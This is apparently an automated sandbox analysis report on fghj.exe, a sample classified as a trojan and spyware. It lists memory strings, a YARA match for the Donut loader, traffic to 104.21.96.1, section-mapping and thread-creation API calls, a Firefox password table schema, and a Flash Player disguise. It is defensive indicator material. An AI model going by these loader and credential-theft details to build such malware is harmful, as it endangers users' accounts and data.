              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49815 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49826 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49832 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49844 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49850 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49861 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49872 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49878 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49889 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B4FE8D NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_00B4FE8D
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A88F20_2_003A88F2
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A7A3B0_2_003A7A3B
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A76190_2_003A7619
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A80100_2_003A8010
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A827C0_2_003A827C
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A70B20_2_003A70B2
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A6EB00_2_003A6EB0
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A86AA0_2_003A86AA
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A7EFA0_2_003A7EFA
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A8AFF0_2_003A8AFF
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A86F60_2_003A86F6
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A70D70_2_003A70D7
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A873A0_2_003A873A
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003AA13E0_2_003AA13E
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A6F230_2_003A6F23
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A79110_2_003A7911
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A836A0_2_003A836A
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A774E0_2_003A774E
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A79980_2_003A7998
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A899E0_2_003A899E
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B0038B0_2_00B0038B
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B4FE8D0_2_00B4FE8D
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B390A50_2_00B390A5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B3609B0_2_00B3609B
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B000000_2_00B00000
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B071950_2_00B07195
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B3F1850_2_00B3F185
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B371E50_2_00B371E5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B0A1D50_2_00B0A1D5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B051750_2_00B05175
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B231450_2_00B23145
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B132BD0_2_00B132BD
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B1F3A50_2_00B1F3A5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B2A3980_2_00B2A398
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B4C38D0_2_00B4C38D
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B1A3510_2_00B1A351
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B234B50_2_00B234B5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B4B4990_2_00B4B499
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B3F4C50_2_00B3F4C5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B0C4050_2_00B0C405
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B3B4750_2_00B3B475
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B064550_2_00B06455
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B374450_2_00B37445
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B2D51A0_2_00B2D51A
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B325550_2_00B32555
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B0E55A0_2_00B0E55A
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B1A5450_2_00B1A545
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B1F6E50_2_00B1F6E5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B076E50_2_00B076E5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B4D6350_2_00B4D635
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B166550_2_00B16655
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B3D65A0_2_00B3D65A
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B1C7A50_2_00B1C7A5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B327C50_2_00B327C5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B1B7650_2_00B1B765
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B1D7680_2_00B1D768
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B047550_2_00B04755
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B4C75D0_2_00B4C75D
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B228B50_2_00B228B5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B1F8F50_2_00B1F8F5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B3F8350_2_00B3F835
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B2D82C0_2_00B2D82C
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B288750_2_00B28875
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B379F50_2_00B379F5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B07A950_2_00B07A95
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B0AAC50_2_00B0AAC5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B1CA050_2_00B1CA05
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B38A050_2_00B38A05
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B20A050_2_00B20A05
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B19A090_2_00B19A09
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B4CB950_2_00B4CB95
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B05B250_2_00B05B25
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B09B150_2_00B09B15
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B1ECB50_2_00B1ECB5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B08CF50_2_00B08CF5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B18C190_2_00B18C19
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B30C450_2_00B30C45
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B3AD950_2_00B3AD95
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B37D750_2_00B37D75
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B0BE910_2_00B0BE91
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B3EE850_2_00B3EE85
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B13EF50_2_00B13EF5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B17E400_2_00B17E40
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B2DFAC0_2_00B2DFAC
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B1EF950_2_00B1EF95
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B21FD50_2_00B21FD5
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B0AF350_2_00B0AF35
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B2DF340_2_00B2DF34
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B07F250_2_00B07F25
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B28F630_2_00B28F63
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B0EF6D0_2_00B0EF6D
              Source: C:\Users\user\Desktop\fghj.exeCode function: String function: 00B16645 appears 69 times
              Source: C:\Users\user\Desktop\fghj.exeCode function: String function: 003A140D appears 31 times
              Source: C:\Users\user\Desktop\fghj.exeCode function: String function: 00B09815 appears 75 times
              Source: fghj.exeStatic PE information: invalid certificate
              Source: fghj.exeBinary or memory string: OriginalFilename vs fghj.exe
              Source: fghj.exeBinary or memory string: OriginalFilenameFlashUtil.exeh$ vs fghj.exe
              Source: fghj.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_00B00A9B CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,0_2_00B00A9B
              Source: C:\Users\user\Desktop\fghj.exeCode function: 0_2_003A5B70 LoadLibraryW,GetLastError,FindResourceW,GetLastError,LoadResource,GetLastError,SizeofResource,LockResource,GetLastError,FreeResource,FreeLibrary,0_2_003A5B70
              Source: fghj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\fghj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: fghj.exe, 00000000.00000003.1539126107.00000000039C5000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1551811830.00000000039EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: fghj.exeVirustotal: Detection: 66%
              Source: fghj.exeReversingLabs: Detection: 60%
              Source: fghj.exeString found in binary or memory: http://fpdownload.macromedia.com/get/flashplayer/update/current/install/install_all_win_
              Source: fghj.exeString found in binary or memory: CodeSignLogFileCodeSignRootCertSHGetFolderPathWShell32.dllGetSidSubAuthorityCountGetSidSubAuthorityGetTokenInformationOpenProcessTokenAdvapi32.dllNativeCacheFlash PlayerAdobejoey32iconmetaactivexplugindrmunbrokerplayerdlmforcehelpupdatemaintainuninstallmsiinstallembeddingFlashInstall.logmms.cfgInstallVectorherren 1033;cs 1029;de 1031;es 3082;fr 1036;it 1040;ja 1041;ko 1042;nl 1043;pl 1045;pt 1046;ru 1049;sv 1053;tr 1055;zh_Hans 2052;zh_Hant 1028;lRegServerviv-iv pl_sgn.zax_sgn.zhttp://fpdownload.macromedia.com/get/flashplayer/update/current/install/install_all_win_.dir{FEC7EF28-53E7-4f06-8F56-FA6D670C8D3C}{0697F55F-F461-46fc-BABA-6D27CC032A75}.dll.PostfixCommandLine" "PrefixCommandLineFlashMacromed0
              Source: C:\Users\user\Desktop\fghj.exeFile read: C:\Users\user\Desktop\fghj.exeJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeSection loaded: amsi.dllJump to behavior
